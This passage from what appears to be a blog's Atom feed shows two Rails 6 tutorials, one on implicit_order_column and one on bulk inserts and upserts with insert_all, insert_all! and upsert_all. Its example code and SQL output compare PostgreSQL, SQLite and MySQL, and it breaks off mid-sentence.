      <content type="html"><![CDATA[<p>Rails 6 added <a href="https://github.com/rails/rails/pull/34480">implicit_order_column</a>on <code>ActiveRecord::ModelSchema</code> which allows us to define a custom column forimplicit ordering on the model level. If there is no <code>implicit_order_column</code>defined, Rails takes a primary key as the implicit order column. Also, beforeRails 6, the primary key was used to order records implicitly by default.</p><p>This has impact on methods like<a href="https://api.rubyonrails.org/v5.2/classes/ActiveRecord/FinderMethods.html#method-i-first">first</a>,<a href="https://api.rubyonrails.org/v5.2/classes/ActiveRecord/FinderMethods.html#method-i-last">last</a>and<a href="https://edgeapi.rubyonrails.org/classes/ActiveRecord/FinderMethods.html">many more</a>where implicit ordering is used.</p><p>Let's checkout how it works.</p><h4>Rails 5.2</h4><pre><code class="language-ruby">&gt;&gt; class User &lt; ApplicationRecord&gt;&gt;   validates :name, presence: true&gt;&gt; end=&gt; {:presence=&gt;true}&gt;&gt; User.firstSELECT &quot;users&quot;.* FROM &quot;users&quot; ORDER BY &quot;users&quot;.&quot;id&quot; ASC LIMIT $1  [[&quot;LIMIT&quot;, 1]]=&gt; #&lt;User id: 1, name: &quot;Amit&quot;, created_at: &quot;2019-03-11 00:18:41&quot;, updated_at: &quot;2019-03-11 00:18:41&quot;&gt;&gt;&gt; User.lastSELECT &quot;users&quot;.* FROM &quot;users&quot; ORDER BY &quot;users&quot;.&quot;id&quot; DESC LIMIT $1  [[&quot;LIMIT&quot;, 1]]=&gt; #&lt;User id: 2, name: &quot;Mark&quot;, created_at: &quot;2019-03-11 00:20:42&quot;, updated_at: &quot;2019-03-11 00:20:42&quot;&gt;&gt;&gt; class User &lt; ApplicationRecord&gt;&gt;   validates :name, presence: true&gt;&gt;   self.implicit_order_column = &quot;updated_at&quot;&gt;&gt; end=&gt; Traceback (most recent call last):        2: from (irb):10        1: from (irb):12:in '&lt;class:User&gt;'NoMethodError (undefined method 'implicit_order_column=' for 
#&lt;Class:0x00007faf4d6cb408&gt;)</code></pre><h4>Rails 6.0.0.beta2</h4><pre><code class="language-ruby">&gt;&gt; class User &lt; ApplicationRecord
&gt;&gt;   validates :name, presence: true
&gt;&gt; end
=&gt; {:presence=&gt;true}
&gt;&gt; User.first
SELECT &quot;users&quot;.* FROM &quot;users&quot; ORDER BY &quot;users&quot;.&quot;id&quot; ASC LIMIT $1  [[&quot;LIMIT&quot;, 1]]
=&gt; #&lt;User id: 1, name: &quot;Amit&quot;, created_at: &quot;2019-03-11 00:18:41&quot;, updated_at: &quot;2019-03-11 00:18:41&quot;&gt;
&gt;&gt; User.last
SELECT &quot;users&quot;.* FROM &quot;users&quot; ORDER BY &quot;users&quot;.&quot;id&quot; DESC LIMIT $1  [[&quot;LIMIT&quot;, 1]]
=&gt; #&lt;User id: 2, name: &quot;Mark&quot;, created_at: &quot;2019-03-11 00:20:42&quot;, updated_at: &quot;2019-03-11 00:20:42&quot;&gt;
&gt;&gt; class User &lt; ApplicationRecord
&gt;&gt;   validates :name, presence: true
&gt;&gt;   self.implicit_order_column = &quot;updated_at&quot;
&gt;&gt; end
=&gt; &quot;updated_at&quot;
&gt;&gt; User.find(1).touch
SELECT &quot;users&quot;.* FROM &quot;users&quot; WHERE &quot;users&quot;.&quot;id&quot; = $1 LIMIT $2  [[&quot;id&quot;, 1], [&quot;LIMIT&quot;, 1]]
UPDATE &quot;users&quot; SET &quot;updated_at&quot; = $1 WHERE &quot;users&quot;.&quot;id&quot; = $2  [[&quot;updated_at&quot;, &quot;2019-03-11 00:23:33.369021&quot;], [&quot;id&quot;, 1]]
=&gt; true
&gt;&gt; User.first
SELECT &quot;users&quot;.* FROM &quot;users&quot; ORDER BY &quot;users&quot;.&quot;updated_at&quot; ASC LIMIT $1  [[&quot;LIMIT&quot;, 1]]
=&gt; #&lt;User id: 2, name: &quot;Mark&quot;, created_at: &quot;2019-03-11 00:20:42&quot;, updated_at: &quot;2019-03-11 00:23:09&quot;&gt;
&gt;&gt; User.last
SELECT &quot;users&quot;.* FROM &quot;users&quot; ORDER BY &quot;users&quot;.&quot;updated_at&quot; DESC LIMIT $1  [[&quot;LIMIT&quot;, 1]]
=&gt; #&lt;User id: 1, name: &quot;Amit&quot;, created_at: &quot;2019-03-11 00:18:41&quot;, updated_at: &quot;2019-03-11 00:23:33&quot;&gt;</code></pre><p>Here is the relevant <a 
href="https://github.com/rails/rails/pull/34480">pull request</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Bulk insert support in Rails 6]]></title>
       <author><name>Vishal Telangre</name></author>
      <link href="https://www.bigbinary.com/blog/bulk-insert-support-in-rails-6"/>
      <updated>2019-04-15T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/bulk-insert-support-in-rails-6</id>
      <content type="html"><![CDATA[<p>Rails 6 has added support for bulk inserts, similar to how bulk update is supported using <code>update_all</code> and bulk delete is supported using <code>delete_all</code>.</p><p>Bulk inserts can be performed using the newly added methods <code>insert_all</code>, <code>insert_all!</code> and <code>upsert_all</code>.</p><p>All of these methods insert multiple records of the same model into the database. They prepare a single <code>INSERT</code> SQL query and send a single statement to the database, without instantiating the model or invoking Active Record callbacks or validations.</p><p>A bulk insert can violate the primary key, a unique index, or a unique constraint. Rails leverages database-specific features to either skip or upsert the duplicates, depending on the case.</p><p>Let's discuss the <code>insert_all</code>, <code>insert_all!</code> and <code>upsert_all</code> methods in detail, which are all used to perform bulk inserts.</p><p>We will create an <code>articles</code> table with two unique indexes.</p><pre><code class="language-ruby">create_table :articles do |t|
  t.string :title, null: false
  t.string :slug, null: false
  t.string :author, null: false
  t.text :description
  t.index :slug, unique: true
  t.index [:title, :author], unique: true
end</code></pre><p>Note that we do not allow duplicate <code>slug</code> values. We also prevent records from having the same <code>title</code> and <code>author</code> combination.</p><p>To try out the examples provided in this blog post, always clean up the <code>articles</code> table before running each example.</p><h2>1. Performing bulk inserts by skipping duplicates</h2><p>Let's say we want to insert multiple articles at once into the database. 
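</p>

<p>Before looking at <code>insert_all</code>, here is a plain-Ruby sketch (an illustration only, not the Rails API) of what "duplicate" means under the schema above: a row conflicts if its <code>id</code>, its <code>slug</code>, or its <code>[title, author]</code> pair has already been taken.</p>

```ruby
# Plain-Ruby illustration of the uniqueness rules declared in the migration
# above: a unique index on :slug, a multi-column unique index on
# [:title, :author], plus the primary key on :id. In reality the database
# itself performs this check via its unique indexes.
def duplicate_rows(rows)
  seen = { id: {}, slug: {}, title_author: {} }
  rows.select do |row|
    keys = { id: row[:id], slug: row[:slug], title_author: [row[:title], row[:author]] }
    dup = keys.any? { |index, value| seen[index].key?(value) }
    keys.each { |index, value| seen[index][value] = true }
    dup
  end
end

rows = [
  { id: 1, title: 'A', author: 'John', slug: 'a' },
  { id: 1, title: 'B', author: 'Meg',  slug: 'b' }, # duplicate 'id'
  { id: 2, title: 'A', author: 'John', slug: 'c' }, # duplicate 'title' & 'author'
  { id: 3, title: 'C', author: 'Ann',  slug: 'a' }  # duplicate 'slug'
]
duplicate_rows(rows).map { |r| r[:id] } # => [1, 2, 3]
```

<p>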
It is possible that some records violate the unique constraint(s) of the table. Such records are considered duplicates.</p><p>By default, a row counts as a duplicate if it conflicts with any unique index on the table.</p><p>To skip the duplicate rows and insert the rest of the records at once, we can use the <code>ActiveRecord::Persistence#insert_all</code> method.</p><h5>1.1 Behavior with PostgreSQL</h5><p>Let's run the following example on a PostgreSQL database.</p><pre><code class="language-ruby">result = Article.insert_all(
  [
    { id: 1,
      title: 'Handling 1M Requests Per Second',
      author: 'John',
      slug: '1m-req-per-second' },
    { id: 1, # duplicate 'id' here
      title: 'Type Safety in Elm',
      author: 'George',
      slug: 'elm-type-safety' },
    { id: 2,
      title: 'Authentication with Devise - Part 1',
      author: 'Laura',
      slug: 'devise-auth-1' },
    { id: 3,
      title: 'Authentication with Devise - Part 1',
      author: 'Laura', # duplicate 'title' &amp; 'author' here
      slug: 'devise-auth-2' },
    { id: 4,
      title: 'Dockerizing and Deploying Rails App to Kubernetes',
      author: 'Paul',
      slug: 'rails-on-k8s' },
    { id: 5,
      title: 'Elm on Rails',
      author: 'Amanda',
      slug: '1m-req-per-second' }, # duplicate 'slug' here
    { id: 6,
      title: 'Working Remotely',
      author: 'Greg',
      slug: 'working-remotely' }
  ]
)

# Bulk Insert (2.3ms)  INSERT INTO &quot;articles&quot;(&quot;id&quot;,&quot;title&quot;,&quot;author&quot;,&quot;slug&quot;) VALUES (1, 'Handling 1M Requests  [...snip...] 
'working-remotely') ON CONFLICT  DO NOTHING RETURNING &quot;id&quot;

puts result.inspect
#&lt;ActiveRecord::Result:0x00007fb6612a1ad8 @columns=[&quot;id&quot;], @rows=[[1], [2], [4], [6]], @hash_rows=nil, @column_types={&quot;id&quot;=&gt;#&lt;ActiveModel::Type::Integer:0x00007fb65f420078 @precision=nil, @scale=nil, @limit=8, @range=-9223372036854775808...9223372036854775808&gt;}&gt;

puts Article.count
# 4</code></pre><p>The <code>insert_all</code> method accepts a mandatory argument, which should be an array of hashes containing the attributes of the same model. The keys in all the hashes should be the same.</p><p>Notice the <code>ON CONFLICT DO NOTHING</code> clause in the <code>INSERT</code> query. This clause is supported by the PostgreSQL and SQLite databases. It instructs the database to silently skip a conflicting record and proceed with the insertion of the next record whenever there is a conflict or a unique key constraint violation during the bulk insert operation.</p><p>In the above example, we have exactly 3 records which violate various unique constraints defined on the <code>articles</code> table.</p><p>One of the records being inserted has a duplicate <code>id: 1</code> attribute, which violates the unique primary key constraint. Another record, with duplicate <code>title: 'Authentication with Devise - Part 1', author: 'Laura'</code> attributes, violates the multi-column unique index defined on the <code>title</code> and <code>author</code> columns. A third record, with a duplicate <code>slug: '1m-req-per-second'</code> attribute, violates the unique index defined on the <code>slug</code> column.</p><p>All of the records that violate any unique constraint or unique index are skipped and are not inserted into the database.</p><p>If successful, <code>ActiveRecord::Persistence#insert_all</code> returns an instance of <code>ActiveRecord::Result</code>. The contents of the result vary per database. 
In the case of PostgreSQL, this result instance holds information about the successfully inserted records, such as the chosen column names and the values of those columns in each successfully inserted row.</p><p>For PostgreSQL, by default, the <code>insert_all</code> method appends a <code>RETURNING &quot;id&quot;</code> clause to the SQL query, where <code>id</code> is the primary key. This clause instructs the database to return the <code>id</code> of every successfully inserted record. By inspecting the result, especially the <code>@columns=[&quot;id&quot;], @rows=[[1], [2], [4], [6]]</code> attributes of the result instance, we can see that the records having <code>id</code> values <code>1, 2, 4 and 6</code> were successfully inserted.</p><p>What if we want to see more attributes, and not just the <code>id</code> attribute, of the successfully inserted records in the result?</p><p>We can use the optional <code>returning</code> option, which accepts an array of attribute names to be returned for all successfully inserted records.</p><pre><code class="language-ruby">result = Article.insert_all(
  [
    { id: 1,
      title: 'Handling 1M Requests Per Second',
      author: 'John',
      slug: '1m-req-per-second' },
    #...snip...
  ],
  returning: %w[ id title ]
)

# Bulk Insert (2.3ms)  INSERT INTO &quot;articles&quot;(&quot;id&quot;,&quot;title&quot;,&quot;author&quot;,&quot;slug&quot;) VALUES (1, 'Handling 1M Requests  [...snip...] 
'working-remotely') ON CONFLICT  DO NOTHING RETURNING &quot;id&quot;,&quot;title&quot;

puts result.inspect
#&lt;ActiveRecord::Result:0x00007f902a1196f0 @columns=[&quot;id&quot;, &quot;title&quot;], @rows=[[1, &quot;Handling 1M Requests Per Second&quot;], [2, &quot;Authentication with Devise - Part 1&quot;], [4, &quot;Dockerizing and Deploying Rails App to Kubernetes&quot;], [6, &quot;Working Remotely&quot;]], @hash_rows=nil, @column_types={&quot;id&quot;=&gt;#&lt;ActiveModel::Type::Integer:0x00007f90290ca8d0 @precision=nil, @scale=nil, @limit=8, @range=-9223372036854775808...9223372036854775808&gt;, &quot;title&quot;=&gt;#&lt;ActiveModel::Type::String:0x00007f9029978298 @precision=nil, @scale=nil, @limit=nil&gt;}&gt;

puts result.pluck(&quot;id&quot;, &quot;title&quot;).inspect
#[[1, &quot;Handling 1M Requests Per Second&quot;], [2, &quot;Authentication with Devise - Part 1&quot;], [4, &quot;Dockerizing and Deploying Rails App to Kubernetes&quot;], [6, &quot;Working Remotely&quot;]]</code></pre><p>Notice how the <code>INSERT</code> query appends the <code>RETURNING &quot;id&quot;,&quot;title&quot;</code> clause, and the result now holds the <code>id</code> and <code>title</code> attributes of the successfully inserted records.</p><h5>1.2 Behavior with SQLite</h5><p>Similar to PostgreSQL, the violating records are skipped during a bulk insert performed using <code>insert_all</code> when we run our example on a SQLite database.</p><pre><code class="language-ruby">result = Article.insert_all(
  [
    { id: 1, title: 'Handling 1M Requests Per Second', author: 'John', slug: '1m-req-per-second' },
    { id: 1, title: 'Type Safety in Elm', author: 'George', slug: 'elm-type-safety' }, # duplicate 'id' here
    #...snip...
  ]
)

# Bulk Insert (1.6ms)  INSERT INTO &quot;articles&quot;(&quot;id&quot;,&quot;title&quot;,&quot;author&quot;,&quot;slug&quot;) VALUES (1, 'Handling 1M Requests [...snip...] 
'working-remotely') ON CONFLICT  DO NOTHING

puts result.inspect
#&lt;ActiveRecord::Result:0x00007fa9df448ff0 @columns=[], @rows=[], @hash_rows=nil, @column_types={}&gt;

puts Article.pluck(:id, :title)
#[[1, &quot;Handling 1M Requests Per Second&quot;], [2, &quot;Authentication with Devise - Part 1&quot;], [4, &quot;Dockerizing and Deploying Rails App to Kubernetes&quot;], [6, &quot;Working Remotely&quot;]]

puts Article.count
# 4</code></pre><p>Note that since SQLite does not support the <code>RETURNING</code> clause, it is not added to the SQL query. Therefore, the returned <code>ActiveRecord::Result</code> instance does not contain any useful information.</p><p>If we try to explicitly use the <code>returning</code> option when the database being used is SQLite, the <code>insert_all</code> method throws an error.</p><pre><code class="language-ruby">Article.insert_all(
  [
    { id: 1, title: 'Handling 1M Requests Per Second', author: 'John', slug: '1m-req-per-second' },
    #...snip...
  ],
  returning: %w[ id title ]
)
# ActiveRecord::ConnectionAdapters::SQLite3Adapter does not support :returning (ArgumentError)</code></pre><h5>1.3 Behavior with MySQL</h5><p>The records that violate primary key constraints, unique key constraints, or unique indexes are skipped during a bulk insert operation performed using <code>insert_all</code> on a MySQL database.</p><pre><code class="language-ruby">result = Article.insert_all(
  [
    { id: 1, title: 'Handling 1M Requests Per Second', author: 'John', slug: '1m-req-per-second' },
    { id: 1, title: 'Type Safety in Elm', author: 'George', slug: 'elm-type-safety' }, # duplicate 'id' here
    #...snip...
  ]
)

# Bulk Insert (20.3ms)  INSERT INTO `articles`(`id`,`title`,`author`,`slug`) VALUES (1, 'Handling 1M Requests [...snip...] 
'working-remotely') ON DUPLICATE KEY UPDATE `id`=`id`

puts result.inspect
#&lt;ActiveRecord::Result:0x000055d6cfea7580 @columns=[], @rows=[], @hash_rows=nil, @column_types={}&gt;

puts Article.pluck(:id, :title)
#[[1, &quot;Handling 1M Requests Per Second&quot;], [2, &quot;Authentication with Devise - Part 1&quot;], [4, &quot;Dockerizing and Deploying Rails App to Kubernetes&quot;], [6, &quot;Working Remotely&quot;]]

puts Article.count
# 4</code></pre><p>Here, the <code>ON DUPLICATE KEY UPDATE `id`=`id`</code> clause in the <code>INSERT</code> query does essentially the same thing as the <code>ON CONFLICT DO NOTHING</code> clause supported by PostgreSQL and SQLite.</p><p>Since MySQL does not support the <code>RETURNING</code> clause, it is not included in the SQL query, and therefore the result doesn't contain any useful information.</p><p>Explicitly trying to use the <code>returning</code> option with the <code>insert_all</code> method on a MySQL database throws an <code>ActiveRecord::ConnectionAdapters::Mysql2Adapter does not support :returning</code> error.</p><h2>2. Performing bulk inserts by skipping duplicates on a specified unique constraint but raising exception if records violate other unique constraints</h2><p>In the previous case, we were skipping the records that violated any unique constraint. In some cases, we may want to skip duplicates caused by only a specific unique index, but abort the transaction if records violate any other unique constraints.</p><p>The optional <code>unique_by</code> option of the <code>insert_all</code> method allows us to define such a unique constraint.</p><h5>2.1 Behavior with PostgreSQL and SQLite</h5><p>Let's see an example to skip duplicate records that violate only the specified unique index <code>:index_articles_on_title_and_author</code> using the <code>unique_by</code> option. 
The duplicate records that do not violate the <code>index_articles_on_title_and_author</code> index are not skipped, and therefore throw an error.</p><pre><code class="language-ruby">result = Article.insert_all(
  [
    { .... },
    { .... }, # duplicate 'id' here
    { .... },
    { .... }, # duplicate 'title' and 'author' here
    { .... },
    { .... }, # duplicate 'slug' here
    { .... }
  ],
  unique_by: :index_articles_on_title_and_author
)

# PG::UniqueViolation: ERROR:  duplicate key value violates unique constraint &quot;articles_pkey&quot; (ActiveRecord::RecordNotUnique)
# DETAIL:  Key (id)=(1) already exists.</code></pre><p>In case of SQLite, the error appears as shown below.</p><pre><code class="language-text"># SQLite3::ConstraintException: UNIQUE constraint failed: articles.id (ActiveRecord::RecordNotUnique)</code></pre><p>In this case, we get an <code>ActiveRecord::RecordNotUnique</code> error, which is caused by the violation of the primary key constraint on the <code>id</code> column.</p><p>The second record in the example above, which violated the unique index on the primary key <code>id</code>, was not skipped, since the <code>unique_by</code> option specified a different unique index.</p><p>When an exception occurs, no record persists to the database, since <code>insert_all</code> executes just a single SQL query.</p><p>The <code>unique_by</code> option can be identified by columns or a unique index name.</p><pre><code class="language-ruby">unique_by: :index_articles_on_title_and_author
# is same as
unique_by: %i[ title author ]

# Also,
unique_by: :slug
# is same as
unique_by: %i[ slug ]
# and also same as
unique_by: :index_articles_on_slug</code></pre><p>Let's remove (or fix) the record that has the duplicate primary key and re-run the above example.</p><pre><code class="language-ruby">result = Article.insert_all(
  [
    { .... },
    { .... },
    { .... },
    { .... }, # duplicate 'title' and 'author' here
    { .... },
    { .... 
}, # duplicate 'slug' here
    { .... }
  ],
  unique_by: :index_articles_on_title_and_author
)

# PG::UniqueViolation: ERROR:  duplicate key value violates unique constraint &quot;index_articles_on_slug&quot; (ActiveRecord::RecordNotUnique)
# DETAIL:  Key (slug)=(1m-req-per-second) already exists.</code></pre><p>In case of SQLite, the error appears as shown below.</p><pre><code class="language-ruby"># SQLite3::ConstraintException: UNIQUE constraint failed: articles.slug (ActiveRecord::RecordNotUnique)</code></pre><p>The <code>ActiveRecord::RecordNotUnique</code> error in the example above now says the <code>index_articles_on_slug</code> unique constraint is violated. Note how it intentionally didn't raise an error for the unique constraint violated on the <code>title</code> and <code>author</code> columns by the fourth record.</p><p>Now we will remove (or fix) the record that has the same slug.</p><pre><code class="language-ruby">result = Article.insert_all(
  [
    { .... },
    { .... },
    { .... },
    { .... }, # duplicate 'title' and 'author' here
    { .... },
    { .... },
    { .... }
  ],
  unique_by: :index_articles_on_title_and_author
)

# Bulk Insert (2.5ms)  INSERT INTO &quot;articles&quot;(&quot;id&quot;,&quot;title&quot;,&quot;author&quot;,&quot;slug&quot;) VALUES (1, 'Handling 1M Requests Per Second', [...snip...] 
'working-remotely') ON CONFLICT (&quot;title&quot;,&quot;author&quot;) DO NOTHING RETURNING &quot;id&quot;

puts result.inspect
#&lt;ActiveRecord::Result:0x00007fada2069828 @columns=[&quot;id&quot;], @rows=[[1], [7], [2], [4], [5], [6]], @hash_rows=nil, @column_types={&quot;id&quot;=&gt;#&lt;ActiveModel::Type::Integer:0x00007fad9fdb9df0 @precision=nil, @scale=nil, @limit=8, @range=-9223372036854775808...9223372036854775808&gt;}&gt;</code></pre><p>Here, the fourth record was skipped, since that record violates the unique index <code>index_articles_on_title_and_author</code> specified by the <code>unique_by</code> option.</p><p>Similarly, we can specify a different unique index using the <code>unique_by</code> option. For example, if we specify the <code>unique_by: :slug</code> option, then the records containing duplicate <code>slug</code> columns will be skipped, but an <code>ActiveRecord::RecordNotUnique</code> exception will be raised if any record violates other unique constraints.</p><h5>2.2 Behavior with MySQL</h5><p>The <code>unique_by</code> option is not supported when the database is MySQL.</p><h2>3. Raising exception if any of the records being bulk inserted violate any unique constraints</h2><p>The <code>insert_all!</code> method (the bang version) never skips a duplicate record. If a record violates any unique constraint, the <code>insert_all!</code> method simply throws an <code>ActiveRecord::RecordNotUnique</code> error.</p><p>When the database is PostgreSQL, the <code>insert_all!</code> method can accept the optional <code>returning</code> option, which we discussed in depth in section 1.1 above.</p><p>The <code>unique_by</code> option is not supported by the <code>insert_all!</code> method.</p><h2>4. Performing bulk upserts (updates or inserts)</h2><p>So far, in sections 1, 2 and 3 above, we discussed either skipping the duplicates or raising an exception if a duplicate is encountered during bulk inserts. 
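</p>

<p>The skip-versus-raise contrast recapped above can be sketched in plain Ruby (an illustration of the semantics only; the hypothetical <code>bulk_insert</code> below is not the Rails API, and Rails delegates the real work to a single SQL statement):</p>

```ruby
# A toy in-memory "table" keyed by primary key. With raise_on_duplicate: false,
# duplicates are skipped silently, like insert_all; with raise_on_duplicate: true,
# the whole batch is rejected before anything is written, like insert_all!.
def bulk_insert(table, rows, raise_on_duplicate: false)
  duplicates = rows.select { |row| table.key?(row[:id]) }
  if raise_on_duplicate && duplicates.any?
    raise "duplicate key value #{duplicates.first[:id]}" # nothing persists
  end
  (rows - duplicates).each { |row| table[row[:id]] ||= row }
  table
end

table = { 1 => { id: 1, title: 'Existing' } }
bulk_insert(table, [{ id: 1, title: 'Dup' }, { id: 2, title: 'New' }])
table.keys       # => [1, 2]
table[1][:title] # => "Existing" (the duplicate was skipped, not updated)
```

<p>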
Sometimes, we want to update the existing record when a duplicate occurs, and otherwise insert a new record. This operation is called an upsert, because it either updates the matching record or, if there is no record to update, inserts a new one.</p><p>The <code>upsert_all</code> method in Rails 6 allows performing bulk upserts.</p><p>Let's see its usage and behavior with different database systems.</p><h6>4.1 <code>upsert_all</code> in MySQL</h6><p>Let's try to bulk upsert multiple articles containing some duplicates.</p><pre><code class="language-ruby">result = Article.upsert_all(
  [
    { id: 1, title: 'Handling 1M Requests Per Second', author: 'John', slug: '1m-req-per-second' },
    { id: 1, .... }, # duplicate 'id' here
    { id: 2, .... },
    { id: 3, .... }, # duplicate 'title' and 'author' here
    { id: 4, .... },
    { id: 5, .... }, # duplicate 'slug' here
    { id: 6, .... }
  ]
)

# Bulk Insert (26.3ms)  INSERT INTO `articles`(`id`,`title`,`author`,`slug`) VALUES (1, 'Handling 1M Requests Per Second', 'John', [...snip...] 
'working-remotely') ON DUPLICATE KEY UPDATE `title`=VALUES(`title`),`author`=VALUES(`author`),`slug`=VALUES(`slug`)

puts result.inspect
#&lt;ActiveRecord::Result:0x000055a43c1fae10 @columns=[], @rows=[], @hash_rows=nil, @column_types={}&gt;

puts Article.count
# 5

puts Article.all
#&lt;ActiveRecord::Relation [#&lt;Article id: 1, title: &quot;Type Safety in Elm&quot;, slug: &quot;elm-type-safety&quot;, author: &quot;George&quot;, description: nil&gt;, #&lt;Article id: 2, title: &quot;Authentication with Devise - Part 1&quot;, slug: &quot;devise-auth-2&quot;, author: &quot;Laura&quot;, description: nil&gt;, #&lt;Article id: 4, title: &quot;Dockerizing and Deploying Rails App to Kubernetes&quot;, slug: &quot;rails-on-k8s&quot;, author: &quot;Paul&quot;, description: nil&gt;, #&lt;Article id: 5, title: &quot;Elm on Rails&quot;, slug: &quot;1m-req-per-second&quot;, author: &quot;Amanda&quot;, description: nil&gt;, #&lt;Article id: 6, title: &quot;Working Remotely&quot;, slug: &quot;working-remotely&quot;, author: &quot;Greg&quot;, description: nil&gt;]&gt;</code></pre><p>The persisted records in the database look exactly as intended. 
Let's discuss it in detail.</p><p>The second row in the input array, which has the duplicate <code>id: 1</code> attribute, replaced the first row with the same <code>id</code>.</p><p>The fourth row, which has <code>id: 3</code>, replaced the attributes of the third row, since both had duplicate &quot;title&quot; and &quot;author&quot; attributes.</p><p>The rest of the rows either were not duplicates or no longer remained duplicates, and therefore were inserted without any issues.</p><p>Note that the <code>returning</code> and <code>unique_by</code> options are not supported in the <code>upsert_all</code> method when the database is MySQL.</p><h6>4.2 <code>upsert_all</code> in SQLite</h6><p>Let's try to execute the same example from section 4.1 above when the database is SQLite.</p><pre><code class="language-ruby">result = Article.upsert_all(
  [
    { id: 1, title: 'Handling 1M Requests Per Second', author: 'John', slug: '1m-req-per-second' },
    { id: 1, title: 'Type Safety in Elm', author: 'George', slug: 'elm-type-safety' }, # duplicate 'id' here
    { id: 2, title: 'Authentication with Devise - Part 1', author: 'Laura', slug: 'devise-auth-1' },
    { id: 3, title: 'Authentication with Devise - Part 1', author: 'Laura', slug: 'devise-auth-2' }, # duplicate 'title' and 'author' here
    { id: 4, title: 'Dockerizing and Deploying Rails App to Kubernetes', author: 'Paul', slug: 'rails-on-k8s' },
    { id: 5, title: 'Elm on Rails', author: 'Amanda', slug: '1m-req-per-second' }, # duplicate 'slug' here
    { id: 6, title: 'Working Remotely', author: 'Greg', slug: 'working-remotely' }
  ]
)

# Bulk Insert (4.0ms)  INSERT INTO &quot;articles&quot;(&quot;id&quot;,&quot;title&quot;,&quot;author&quot;,&quot;slug&quot;) VALUES (1, 'Handling 1M Requests Per Second', [...snip...] 
'working-remotely') ON CONFLICT (&quot;id&quot;) DO UPDATE SET &quot;title&quot;=excluded.&quot;title&quot;,&quot;author&quot;=excluded.&quot;author&quot;,&quot;slug&quot;=excluded.&quot;slug&quot;

# SQLite3::ConstraintException: UNIQUE constraint failed: articles.title, articles.author (ActiveRecord::RecordNotUnique)</code></pre><p>The bulk upsert operation failed in the above example due to an <code>ActiveRecord::RecordNotUnique</code> exception.</p><p>Why didn't it work the same way as in MySQL?</p><p>As per the MySQL documentation, an upsert takes place whenever a new record violates any unique constraint.</p><p>In SQLite, by default, a new record replaces the existing record only when both have the same primary key. If a record violates any unique constraint other than the primary key, it raises an <code>ActiveRecord::RecordNotUnique</code> exception.</p><p>The <code>ON CONFLICT (&quot;id&quot;) DO UPDATE</code> clause in the SQL query above conveys the same intent.</p><p>Therefore, <code>upsert_all</code> in SQLite doesn't behave exactly the same as in MySQL.</p><p>As a workaround, we need to upsert records with multiple <code>upsert_all</code> calls, using the <code>unique_by</code> option.</p><p>If a duplicate record encountered during the upsert operation violates the unique index specified using the <code>unique_by</code> option, it will replace the attributes of the existing matching record.</p><p>Let's try to understand this workaround with another example.</p><pre><code class="language-ruby">Article.upsert_all(
  [
    { id: 1, title: 'Handling 1M Requests Per Second', author: 'John', slug: '1m-req-per-second' },
    { id: 1, title: 'Type Safety in Elm', author: 'George', slug: 'elm-type-safety' }, # duplicate 'id' here
  ],
  unique_by: :id
)

Article.upsert_all(
  [
    { id: 2, title: 'Authentication with Devise - Part 1', author: 'Laura', slug: 'devise-auth-1' },
    { id: 3, title: 'Authentication 
with Devise - Part 1', author: 'Laura', slug: 'devise-auth-2' }, # duplicate 'title' and 'author' here
    { id: 4, title: 'Dockerizing and Deploying Rails App to Kubernetes', author: 'Paul', slug: 'rails-on-k8s' },
    { id: 5, title: 'Elm on Rails', author: 'Amanda', slug: '1m-req-per-second' }, # duplicate 'slug' here
    { id: 6, title: 'Working Remotely', author: 'Greg', slug: 'working-remotely' }
  ],
  unique_by: %i[ title author ]
)

puts Article.count
# 5

puts Article.all
#&lt;ActiveRecord::Relation [#&lt;Article id: 1, title: &quot;Type Safety in Elm&quot;, slug: &quot;elm-type-safety&quot;, author: &quot;George&quot;, description: nil&gt;, #&lt;Article id: 2, title: &quot;Authentication with Devise - Part 1&quot;, slug: &quot;devise-auth-2&quot;, author: &quot;Laura&quot;, description: nil&gt;, #&lt;Article id: 4, title: &quot;Dockerizing and Deploying Rails App to Kubernetes&quot;, slug: &quot;rails-on-k8s&quot;, author: &quot;Paul&quot;, description: nil&gt;, #&lt;Article id: 5, title: &quot;Elm on Rails&quot;, slug: &quot;1m-req-per-second&quot;, author: &quot;Amanda&quot;, description: nil&gt;, #&lt;Article id: 6, title: &quot;Working Remotely&quot;, slug: &quot;working-remotely&quot;, author: &quot;Greg&quot;, description: nil&gt;]&gt;</code></pre><p>Here, we first upsert the records that violated the unique primary key index on the <code>id</code> column. 
Later, we successfully upsert all the remaining records, which violated the unique index on the <code>title</code> and <code>author</code> columns.</p><p>Note that since the first record's <code>slug</code> attribute had already been replaced with the second record's <code>slug</code> attribute, the second-to-last record, having <code>id: 5</code>, didn't raise an exception because of a duplicate <code>slug</code> column.</p><h6>4.3 <code>upsert_all</code> in PostgreSQL</h6><p>We will run the same example from section 4.1 above with a PostgreSQL database.</p><pre><code class="language-ruby">result = Article.upsert_all(
  [
    { id: 1, title: 'Handling 1M Requests Per Second', author: 'John', slug: '1m-req-per-second' },
    { id: 1, title: 'Type Safety in Elm', author: 'George', slug: 'elm-type-safety' }, # duplicate 'id' here
    { id: 2, title: 'Authentication with Devise - Part 1', author: 'Laura', slug: 'devise-auth-1' },
    { id: 3, title: 'Authentication with Devise - Part 1', author: 'Laura', slug: 'devise-auth-2' }, # duplicate 'title' and 'author' here
    { id: 4, title: 'Dockerizing and Deploying Rails App to Kubernetes', author: 'Paul', slug: 'rails-on-k8s' },
    { id: 5, title: 'Elm on Rails', author: 'Amanda', slug: '1m-req-per-second' }, # duplicate 'slug' here
    { id: 6, title: 'Working Remotely', author: 'Greg', slug: 'working-remotely' }
  ]
)

# PG::CardinalityViolation: ERROR:  ON CONFLICT DO UPDATE command cannot affect row a second time (ActiveRecord::StatementInvalid)
# HINT:  Ensure that no rows proposed for insertion within the same command have duplicate constrained values.</code></pre><p>The bulk upsert operation failed in the above example due to an <code>ActiveRecord::StatementInvalid</code> exception, which was caused by an underlying <code>PG::CardinalityViolation</code> exception.</p><p>The <code>PG::CardinalityViolation</code> exception originates from <a 
